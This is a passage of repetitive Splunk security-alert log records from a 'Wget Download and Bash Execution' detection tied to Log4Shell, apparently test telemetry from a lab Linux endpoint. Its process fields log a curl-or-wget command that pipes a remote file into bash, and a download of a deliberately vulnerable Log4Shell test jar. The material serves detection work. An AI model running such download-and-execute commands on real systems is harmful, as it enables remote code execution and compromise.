bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641854, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", 